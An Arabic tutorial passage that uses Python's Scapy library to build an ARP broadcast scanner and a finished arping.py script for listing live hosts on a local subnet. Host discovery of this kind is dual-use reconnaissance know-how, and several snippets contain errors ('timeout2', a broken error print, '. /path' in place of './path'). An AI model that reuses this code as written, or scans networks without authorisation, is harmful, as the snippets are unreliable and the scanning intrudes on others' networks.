العنوان الذي في خانة dst و الخاص بإطار Ethernet هو عنوان broadcast و معناه أرسال هذه الرسالة لجميع المنافذ ما عدا المنفذ المرسل , في نظام ويندوز لن يكون هذا العنوان للمرسل , للتغيير فقط قم بدخل للمتغير dst في كائن (Object) الإيثرنت الذي إنشائنا :


myFrame.dst = "ff:ff:ff:ff:ff:ff"

أما عنوان المرسل فالمكتبة تستخدم عنوانك الفيزيائي للبطاقة المستخدمة , في حالة برنامجنا فهذا هو المطلوب .

و الأن قد تتساءل لماذا لم نغير نوع الاطار (Frame) لنوع أطار برتوكول ARP , لكي تعرف السبب سوف نضيف طبق برتوكول ARP للإطار الذي تم إنشائه :

myFrame = myFrame / ARP()

الأن قم بعرض الإطار بأستخدام الدالة show و لاحظ التغير :

>>> myFrame.show()
###[ Ethernet ]###
dst= ff:ff:ff:ff:ff:ff
src=
11:36:12:54:14:49 
  type= ARP
###[ ARP ]###
hwtype= 0x1
ptype= IPv4
hwlen= None
plen= None
op= who-has
hwsrc=
11:36:12:54:14:49 
     psrc= 192.168.1.148
hwdst= 00:00:00:00:00:00
pdst= 0.0.0.0

>>


هل لاحظت نوع إطار الإيثرنت , لقد تغير إلى ARP , بدون أي داعي من قبلك لتغيير أي شيء , كما أن طريقة العرض و الأضافة كطبقات تسهل عملية الأضافة و البرمجة .
نوع ARP هنا تجده في القيمة op هو who-has هو طلب استفسار عن العنوان الفيزيائي لعنوان أنترنت و هو المطلوب لبرنامجنا لذا لن نغير أي شيء , العنوان الفيزيائي للجهة المرسل إليها في الطبقة الخاصة ببرتوكول ARP هي 00:00:00:00:00:00 و هو ايضا عنوان خاص بالإرسال إلى الكل (broadcast) .

نحتاج فقط لوضع عنوان الأنترنت الذي نريد التأكد من وجوده في الشبكة المحلية , نستطيع أن نكتب عنوان واحد كالتالي :

myFrame.pdst = "192.168.1.114"

و لكن تذكر نريد أن نعرض جميع الأجهزة المتصلة , قد تقترح أن تقوم بعمل حلقة تكرارية (Loop) كالتالي :

for i in range(1,254):
    myFrame.pdst = "192.168.1." + str(i) 
    #الإرسال هنا و الاستقبال - سنضيف ذلك  
 
 هذا حل جيد و لكن هنالك طريقة أفضل فمكتبة Scapy توفر أمكانية استخدام المدى لعنوانين الأنترنت فنكتب كالتالي :


myFrame.pdst = "192.168.1.0/24"

 و الأن إلى الأرسال و عرض النتائج باستخدام الدالة srp التي تقوم لنا بعملية الأرسال و الأستقبال حرف p في نهاية اسم الدالة يدل على أنها ترسل و تستقبل في الطبقة الثانية ( Data Link ) من نموذج OSI , هذه الدالة ترجع Tuple يحتوي على الطلبات التي تم الأستجابة لها و التي تم رفضها , لكي تقوم بتجاهل الطلبات التي تم تجاهلها فقط أستبدل اسم المتغيرunanswered بـ _ :

answered , unanswered = srp(myFrame,timeout2)

وهنا الأمر بعد التعديل لتجاهل الطلبات التي لم يتم الرد عليها :
 


answered , _ = srp(myFrame,timeout2)
 
 لعرض النتائج تستطيع استخدام الدالة summary الموجودة في المكتبة كالتالي :

answered.summary()

لتقليل البيانات المعروضة استخدم هذا الحلقة التكرارية , سوف نقوم بدوران في القائمة التي لدينا و التي تحتوي على tuple يحتوي على البيانات المرسلة و المستقبلة   و سوف نقوم بتجاهل ما تم ارسالها و عرض فقط الردود :

for _ , recv in answered :
    print(recv.summary())
 

 
هذا الخطوات هي ببساطة ما سوف يقوم به السكريبت , الأن سوف نضع هذه الأوامر في سكريبت .
 
 
  • السكريبت النهائي :

 
#!/usr/bin/env python
import sys
from scapy.all import srp,Ether,ARP,conf

#الحصول على مدى عنوانين الشبكة او في حالة وجود عنوان واحد

if len(sys.argv) != 2:
    print("Usage:arping.py <Net or IP> Ex. 192.168.1.0/24 or 192.168.1.10")
    exit(1)
#ايقاف  عرض البيانات الأضافية الخاصة بعملية الأرسال 
conf.verb = 0

target = sys.argv[1]
pkt = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=target)

#في حالة وجود خطأ في عنوان الأنترنت أو المدى
try:
    answerd, _ = srp(pkt,timeout=4)
except Exception as e:
    print("Error: " + e.__class__, " occurred.")
    exit(2)



for _ , recv in answerd :
    #عرض فقط عنوان الانترنت الخاص بالمرسل
    #أذا اردت معلومات أكثر استخدم summary 
    print("IP:" + recv.psrc) 
 
 
 
 
 لتشغيل السكريبت في ويندوز , افنح موجه أوامر خاص بمدير النظام ثم أكتب python متبوعا بمسار الملف الذي حفظته :

python C:\Users\abgoor\Desktop\arping.py 192.168.1.0/24

 أما في نظام لينكس فيجب أن تحول الملف لملف تنفيذي باستخدام الأمر chmod ثم لتنفيذ الأمر استخدم النقطة "." ثم مسار الملف :
 
 
chmod +x /home/abgoor/script/arping.py

. /home/abgoor/script/arping.py 192.168.1.0/24
 
 
  • الخاتمة

    احساس الإنجاز شعور جميل , رغم بساطة برنامجنا إلا أنه يعمل و بشكل جيد , طبعا أريد منك أنك تحاول تطور البرنامج و في الأخير هذا لن يكون الموضوع الأخير عن مكتبة Scapy , هذه المكتبة تعطيك اختيارات غير محدودة في برمجة الشبكات, و أن شاء الله سوف نحاول نغطي هذه الإمكانيات في أكثر من موضوع .
    أذا اعجبك الموضوع طلب بسيط دعوة طيبة منك تكفي :-) .